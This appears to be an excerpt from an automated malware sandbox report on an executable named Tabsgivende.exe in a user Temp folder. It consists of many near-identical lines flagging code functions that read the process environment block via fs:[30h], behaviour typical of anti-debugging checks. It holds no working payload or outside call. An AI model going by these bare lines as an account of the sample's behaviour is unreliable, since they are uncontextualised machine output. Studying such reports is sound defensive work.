Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h] 18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h] 18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov ecx, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EA352 mov eax, dword ptr fs:[00000030h] 18_2_225EA352
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225C437C mov eax, dword ptr fs:[00000030h] 18_2_225C437C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C310 mov ecx, dword ptr fs:[00000030h] 18_2_2251C310
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22540310 mov ecx, dword ptr fs:[00000030h] 18_2_22540310
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A30B mov eax, dword ptr fs:[00000030h] 18_2_2255A30B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A30B mov eax, dword ptr fs:[00000030h] 18_2_2255A30B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A30B mov eax, dword ptr fs:[00000030h] 18_2_2255A30B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DC3CD mov eax, dword ptr fs:[00000030h] 18_2_225DC3CD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h] 18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h] 18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h] 18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h] 18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h] 18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h] 18_2_2252A3C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h] 18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h] 18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h] 18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h] 18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A63C0 mov eax, dword ptr fs:[00000030h] 18_2_225A63C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E3F0 mov eax, dword ptr fs:[00000030h] 18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E3F0 mov eax, dword ptr fs:[00000030h] 18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E3F0 mov eax, dword ptr fs:[00000030h] 18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225563FF mov eax, dword ptr fs:[00000030h] 18_2_225563FF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518397 mov eax, dword ptr fs:[00000030h] 18_2_22518397
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518397 mov eax, dword ptr fs:[00000030h] 18_2_22518397
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518397 mov eax, dword ptr fs:[00000030h] 18_2_22518397
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E388 mov eax, dword ptr fs:[00000030h] 18_2_2251E388
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E388 mov eax, dword ptr fs:[00000030h] 18_2_2251E388
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E388 mov eax, dword ptr fs:[00000030h] 18_2_2251E388
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254438F mov eax, dword ptr fs:[00000030h] 18_2_2254438F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254438F mov eax, dword ptr fs:[00000030h] 18_2_2254438F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522050 mov eax, dword ptr fs:[00000030h] 18_2_22522050
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6050 mov eax, dword ptr fs:[00000030h] 18_2_225A6050
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254C073 mov eax, dword ptr fs:[00000030h] 18_2_2254C073
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h] 18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h] 18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h] 18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h] 18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4000 mov ecx, dword ptr fs:[00000030h] 18_2_225A4000
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6030 mov eax, dword ptr fs:[00000030h] 18_2_225B6030
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A020 mov eax, dword ptr fs:[00000030h] 18_2_2251A020
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C020 mov eax, dword ptr fs:[00000030h] 18_2_2251C020
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A20DE mov eax, dword ptr fs:[00000030h] 18_2_225A20DE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C0F0 mov eax, dword ptr fs:[00000030h] 18_2_2251C0F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225620F0 mov ecx, dword ptr fs:[00000030h] 18_2_225620F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A0E3 mov ecx, dword ptr fs:[00000030h] 18_2_2251A0E3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A60E0 mov eax, dword ptr fs:[00000030h] 18_2_225A60E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225280E9 mov eax, dword ptr fs:[00000030h] 18_2_225280E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252208A mov eax, dword ptr fs:[00000030h] 18_2_2252208A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E60B8 mov eax, dword ptr fs:[00000030h] 18_2_225E60B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E60B8 mov ecx, dword ptr fs:[00000030h] 18_2_225E60B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B80A8 mov eax, dword ptr fs:[00000030h] 18_2_225B80A8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B8158 mov eax, dword ptr fs:[00000030h] 18_2_225B8158
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526154 mov eax, dword ptr fs:[00000030h] 18_2_22526154
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526154 mov eax, dword ptr fs:[00000030h] 18_2_22526154
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C156 mov eax, dword ptr fs:[00000030h] 18_2_2251C156
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h] 18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h] 18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B4144 mov ecx, dword ptr fs:[00000030h] 18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h] 18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h] 18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CA118 mov ecx, dword ptr fs:[00000030h] 18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CA118 mov eax, dword ptr fs:[00000030h] 18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CA118 mov eax, dword ptr fs:[00000030h] 18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CA118 mov eax, dword ptr fs:[00000030h] 18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E0115 mov eax, dword ptr fs:[00000030h] 18_2_225E0115
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22550124 mov eax, dword ptr fs:[00000030h] 18_2_22550124
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov ecx, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E61C3 mov eax, dword ptr fs:[00000030h] 18_2_225E61C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E61C3 mov eax, dword ptr fs:[00000030h] 18_2_225E61C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225501F8 mov eax, dword ptr fs:[00000030h] 18_2_225501F8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F61E5 mov eax, dword ptr fs:[00000030h] 18_2_225F61E5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h] 18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h] 18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h] 18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h] 18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h] 18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h] 18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h] 18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22560185 mov eax, dword ptr fs:[00000030h] 18_2_22560185
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DC188 mov eax, dword ptr fs:[00000030h] 18_2_225DC188
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DC188 mov eax, dword ptr fs:[00000030h] 18_2_225DC188
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253C640 mov eax, dword ptr fs:[00000030h] 18_2_2253C640
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22552674 mov eax, dword ptr fs:[00000030h] 18_2_22552674
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E866E mov eax, dword ptr fs:[00000030h] 18_2_225E866E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E866E mov eax, dword ptr fs:[00000030h] 18_2_225E866E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A660 mov eax, dword ptr fs:[00000030h] 18_2_2255A660
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A660 mov eax, dword ptr fs:[00000030h] 18_2_2255A660
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562619 mov eax, dword ptr fs:[00000030h] 18_2_22562619
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E609 mov eax, dword ptr fs:[00000030h] 18_2_2259E609
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E627 mov eax, dword ptr fs:[00000030h] 18_2_2253E627
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22556620 mov eax, dword ptr fs:[00000030h] 18_2_22556620
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558620 mov eax, dword ptr fs:[00000030h] 18_2_22558620
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252262C mov eax, dword ptr fs:[00000030h] 18_2_2252262C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A6C7 mov ebx, dword ptr fs:[00000030h] 18_2_2255A6C7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A6C7 mov eax, dword ptr fs:[00000030h] 18_2_2255A6C7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h] 18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h] 18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h] 18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h] 18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A06F1 mov eax, dword ptr fs:[00000030h] 18_2_225A06F1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A06F1 mov eax, dword ptr fs:[00000030h] 18_2_225A06F1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524690 mov eax, dword ptr fs:[00000030h] 18_2_22524690
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524690 mov eax, dword ptr fs:[00000030h] 18_2_22524690
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225566B0 mov eax, dword ptr fs:[00000030h] 18_2_225566B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C6A6 mov eax, dword ptr fs:[00000030h] 18_2_2255C6A6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520750 mov eax, dword ptr fs:[00000030h] 18_2_22520750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562750 mov eax, dword ptr fs:[00000030h] 18_2_22562750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562750 mov eax, dword ptr fs:[00000030h] 18_2_22562750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE75D mov eax, dword ptr fs:[00000030h] 18_2_225AE75D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4755 mov eax, dword ptr fs:[00000030h] 18_2_225A4755
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255674D mov esi, dword ptr fs:[00000030h] 18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255674D mov eax, dword ptr fs:[00000030h] 18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255674D mov eax, dword ptr fs:[00000030h] 18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528770 mov eax, dword ptr fs:[00000030h] 18_2_22528770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520710 mov eax, dword ptr fs:[00000030h] 18_2_22520710
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22550710 mov eax, dword ptr fs:[00000030h] 18_2_22550710
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C700 mov eax, dword ptr fs:[00000030h] 18_2_2255C700
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255273C mov eax, dword ptr fs:[00000030h] 18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255273C mov ecx, dword ptr fs:[00000030h] 18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255273C mov eax, dword ptr fs:[00000030h] 18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259C730 mov eax, dword ptr fs:[00000030h] 18_2_2259C730
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C720 mov eax, dword ptr fs:[00000030h] 18_2_2255C720
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C720 mov eax, dword ptr fs:[00000030h] 18_2_2255C720
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252C7C0 mov eax, dword ptr fs:[00000030h] 18_2_2252C7C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A07C3 mov eax, dword ptr fs:[00000030h] 18_2_225A07C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225247FB mov eax, dword ptr fs:[00000030h] 18_2_225247FB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225247FB mov eax, dword ptr fs:[00000030h] 18_2_225247FB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h] 18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h] 18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h] 18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE7E1 mov eax, dword ptr fs:[00000030h] 18_2_225AE7E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225207AF mov eax, dword ptr fs:[00000030h] 18_2_225207AF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254245A mov eax, dword ptr fs:[00000030h] 18_2_2254245A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h] 18_2_2254A470
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h] 18_2_2254A470
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h] 18_2_2254A470
